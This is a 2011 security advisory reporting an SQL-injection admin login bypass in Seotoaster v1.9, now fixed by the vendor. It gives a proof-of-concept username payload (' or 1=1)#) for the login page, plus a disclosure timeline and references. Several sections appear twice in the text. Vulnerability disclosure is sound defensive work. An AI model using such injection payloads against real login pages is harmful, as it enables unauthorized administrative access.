INFOSERVE-ADV2011-06 - Seotoaster SQL-Injection Admin Login Bypass
Advisory:
|
Seotoaster SQL-Injection Admin Login Bypass
|
Advisory ID:
|
INFOSERVE-ADV2011-06
|
Author:
|
Stefan Schurtz
|
Contact:
|
|
Affected Software:
|
Successfully tested on Seotoaster v.1.9
|
Vendor URL:
|
|
Vendor Status:
|
fixed
|
======================
Vulnerability Description
======================
Vulnerability Description
======================
Seotoaster v.1.9 is prone to an SQL-Injection which bypass the admin login
==============
PoC-Exploit
==============
http://<target>/seotoaster/go
User: ‘ or 1=1)#
PW: notimportant
=====
Solution
=====
Upgrade to the latest version
================
Disclosure Timeline
================
15-Nov-2011 – Secunia SVCRP (vuln@secunia.com)
PoC-Exploit
==============
http://<target>/seotoaster/go
User: ‘ or 1=1)#
PW: notimportant
=====
Solution
=====
Upgrade to the latest version
================
Disclosure Timeline
================
15-Nov-2011 – Secunia SVCRP (vuln@secunia.com)
15-Dec-2011 – fixed by vendor
====
Credits
====
Vulnerabilitiy found and advisory written by the INFOSERVE security team.
=======
References
=======
http://secunia.com/advisories/46881/
http://www.infoserve.de/system/files/advisories/INFOSERVE-ADV2011-06.txt
====
Credits
====
Vulnerabilitiy found and advisory written by the INFOSERVE security team.
=======
References
=======
http://secunia.com/advisories/46881/
http://www.infoserve.de/system/files/advisories/INFOSERVE-ADV2011-06.txt
Comments
Display comments as Linear | Threaded